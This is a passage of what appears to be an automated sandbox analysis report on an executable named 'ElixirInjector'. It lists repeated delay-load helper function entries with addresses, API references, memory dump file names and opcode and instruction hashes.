Opcode Fuzzy Hash: 0baa7e719ccd0a4e7d502c74a4311a90dba6c3a0adbd3e271cd2258951c01ae0
Instruction Fuzzy Hash: 00B012C23690107C310411243C07D3B050CD0C2F14331D03FF898C4486B8404D043873

Function 00F2E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bca7737c949fd72ca8ae5f61b139111d496c400af226cca8e466c6298ee8eea5
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: bca7737c949fd72ca8ae5f61b139111d496c400af226cca8e466c6298ee8eea5
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3923707b9dcfd88d532fef4a4c916161fb1fc17d85ef51708f9ca76f9b58f51
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: c3923707b9dcfd88d532fef4a4c916161fb1fc17d85ef51708f9ca76f9b58f51
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a72d8116addc81a64e7361a16fa924522bbbc2766965592d27b41c8462386e4
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: 6a72d8116addc81a64e7361a16fa924522bbbc2766965592d27b41c8462386e4
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4833b554b9eec04d7f3eac115d88c58040a9371157fd391b767f3b58be32edd8
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: 4833b554b9eec04d7f3eac115d88c58040a9371157fd391b767f3b58be32edd8
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8362d43a74ffaae3e7e82c653ea5d1b164baabb5a597d86c50bafabe373ccabc
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: 8362d43a74ffaae3e7e82c653ea5d1b164baabb5a597d86c50bafabe373ccabc
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2b7c05d344bda0adde255ef7de9989f69d89c6091f84c81f36da1160f779bb3b
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: 2b7c05d344bda0adde255ef7de9989f69d89c6091f84c81f36da1160f779bb3b
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 23637477094d7eaba5cb8f66f7fcf631f73a243e09bb4d507b786de126df7ddd
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: 23637477094d7eaba5cb8f66f7fcf631f73a243e09bb4d507b786de126df7ddd
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d3d5ef16ee498218085d5c537226aefc87dbe4f45ae99f8d603d0029d32d3d09
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: d3d5ef16ee498218085d5c537226aefc87dbe4f45ae99f8d603d0029d32d3d09
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 32aebce1f91f259c7a579fc4dbe248350ababdb39eab15458a4c17e8e083578a
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: 32aebce1f91f259c7a579fc4dbe248350ababdb39eab15458a4c17e8e083578a
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E1E3

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4a304b04d417e8c6c0852992b9e5d50fd4c669f42cfbef4323163675cbd2ceae
Instruction ID: d977b818959918b65e0713f59c0f5b4aed7a17d81d5e3e67ddc1e469cab2cc9c
Opcode Fuzzy Hash: 4a304b04d417e8c6c0852992b9e5d50fd4c669f42cfbef4323163675cbd2ceae
Instruction Fuzzy Hash: A4A011E22AA022BC300822823E02C3B022CC0C2B22330883EFC02C0080A880A80038B2

Function 00F2E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E3FC

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7319f8ff2dee99554fea86e9152154be7e243a7df94ce27b8dec69bf2d2ba239
Instruction ID: c8bf707cf97628dff80c2c9396d618b4a1d7286cc62fcc6718b00f11a4c4b224
Opcode Fuzzy Hash: 7319f8ff2dee99554fea86e9152154be7e243a7df94ce27b8dec69bf2d2ba239
Instruction Fuzzy Hash: 3FA001E62AA1627D3148A2527D06DBB1A1DD4C2B26332A52EF869A5481AC845C4538B3

Function 00F2E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E3FC

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d77bcc610655a784a8ebd8244e88f3c6507c272664f00d219ed0817c52350916
Instruction ID: f3cc6e7c4589db3fc2fb0ed7a69c573933dae7fae95d0d9aa93967164a3bd528
Opcode Fuzzy Hash: d77bcc610655a784a8ebd8244e88f3c6507c272664f00d219ed0817c52350916
Instruction Fuzzy Hash: C8A001E62AA162BC3148A2527D06DBB1A1DD4C6B62332A92EF85A95481A8845C4538B3

Function 00F2E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E3FC

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7145fda05a9a714ea8a26bab726ca96f31a5f24f2468c1fb30d74cd8aa60e7a0
Instruction ID: f3cc6e7c4589db3fc2fb0ed7a69c573933dae7fae95d0d9aa93967164a3bd528
Opcode Fuzzy Hash: 7145fda05a9a714ea8a26bab726ca96f31a5f24f2468c1fb30d74cd8aa60e7a0
Instruction Fuzzy Hash: C8A001E62AA162BC3148A2527D06DBB1A1DD4C6B62332A92EF85A95481A8845C4538B3

Function 00F2E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E3FC

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 32b2ac2cebba066b0fcc4fa50dbb0b7265e845db1f075042c8449f1f4d8c3e73
Instruction ID: f3cc6e7c4589db3fc2fb0ed7a69c573933dae7fae95d0d9aa93967164a3bd528
Opcode Fuzzy Hash: 32b2ac2cebba066b0fcc4fa50dbb0b7265e845db1f075042c8449f1f4d8c3e73
Instruction Fuzzy Hash: C8A001E62AA162BC3148A2527D06DBB1A1DD4C6B62332A92EF85A95481A8845C4538B3

Function 00F2E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E3FC

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 88a7511e939152b2ed27f51af3503ad229c46b46084f6a1549e3512196c7a06b
Instruction ID: f3cc6e7c4589db3fc2fb0ed7a69c573933dae7fae95d0d9aa93967164a3bd528
Opcode Fuzzy Hash: 88a7511e939152b2ed27f51af3503ad229c46b46084f6a1549e3512196c7a06b
Instruction Fuzzy Hash: C8A001E62AA162BC3148A2527D06DBB1A1DD4C6B62332A92EF85A95481A8845C4538B3

Function 00F2E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E3FC

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 26372cfd3330f2226f5aecbedc8a114f90945b4b9d310132e925cb399ddd2178
Instruction ID: f3cc6e7c4589db3fc2fb0ed7a69c573933dae7fae95d0d9aa93967164a3bd528
Opcode Fuzzy Hash: 26372cfd3330f2226f5aecbedc8a114f90945b4b9d310132e925cb399ddd2178
Instruction Fuzzy Hash: C8A001E62AA162BC3148A2527D06DBB1A1DD4C6B62332A92EF85A95481A8845C4538B3

Function 00F2E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00F2E580

Part of subcall function 00F2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F2E8D0
Part of subcall function 00F2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F2E8E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
